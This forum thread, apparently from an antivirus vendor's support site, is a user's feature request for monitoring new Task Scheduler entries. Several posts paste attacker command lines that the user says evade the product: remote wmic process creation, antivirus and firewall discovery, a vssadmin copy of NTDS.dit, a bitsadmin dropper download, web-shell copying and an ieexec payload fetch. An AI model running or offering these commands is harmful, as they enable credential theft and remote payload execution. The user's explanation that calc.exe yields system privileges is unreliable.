Перейти к содержимому


Фото
- - - - -

KATANA feature request


  • Please log in to reply
6 ответов в этой теме

#1 sepik

sepik

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 11 Май 2021 - 13:21

Hello,

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries(allow, ask, block)?

I've been testing SS Beta several months against different kind of malwares and i really liked how Katana/DPD/DPH blocks some unknown malwares.

Of course, some unknown malware gets thru(i've submitted dozen of them to the virus lab), and some of them add task scheduler entry that calls undetected dropped files to %appdata% roaming dir.

So every time when the PC gets booted, malware can run its dropped files via task scheduler.

 

Regards,

-sepik

 

 

 



#2 sepik

sepik

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 11 Май 2021 - 16:46

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

 

To kill an av and any firewall product installed.

Seems that it creates "calc.exe" to gain system account, and when you have system priviliges, whole system is compromised.

 

Regards,

-sepik



#3 sepik

sepik

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 11 Май 2021 - 16:51

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

 

To kill an av and any firewall product installed.

Seems that it creates "calc.exe" to gain system account, and when you have system priviliges, whole system is compromised.

 

Also, as a signed MS component, bitsadmin.exe /transfer "DonwloadFile" http://www.mypage.com/%temp/mydropper.htmlgets thru too.

 

 

Regards,

-sepik



#4 sepik

sepik

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 11 Май 2021 - 17:18

Sorry Double-post.

-sepik



#5 SergSG

SergSG

    The Master

  • Posters
  • 14 425 Сообщений:

Отправлено 11 Май 2021 - 17:54

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries(allow, ask, block)?

Of course, some unknown malware gets thru(i've submitted dozen of them to the virus lab), and some of them add task scheduler entry that calls undetected dropped files to %appdata% roaming dir.

So every time when the PC gets booted, malware can run its dropped files via task scheduler.

 

+1



#6 sepik

sepik

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 11 Май 2021 - 19:54

xcopy #{web_shells} C:\inetpub\wwwroot
xcopy PathToAtomicsFolder\T1100\shells\ C:\inetpub\wwwroot
ieexec.exe http://*:8080/bypass.exe



#7 usverg

usverg

    Advanced Member

  • Posters
  • 700 Сообщений:

Отправлено 12 Май 2021 - 08:01

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries(allow, ask, block)?
Definitely +1

But a thing of beauty, I know, will never fade away...



Читают тему: 1

0 пользователей, 1 гостей, 0 скрытых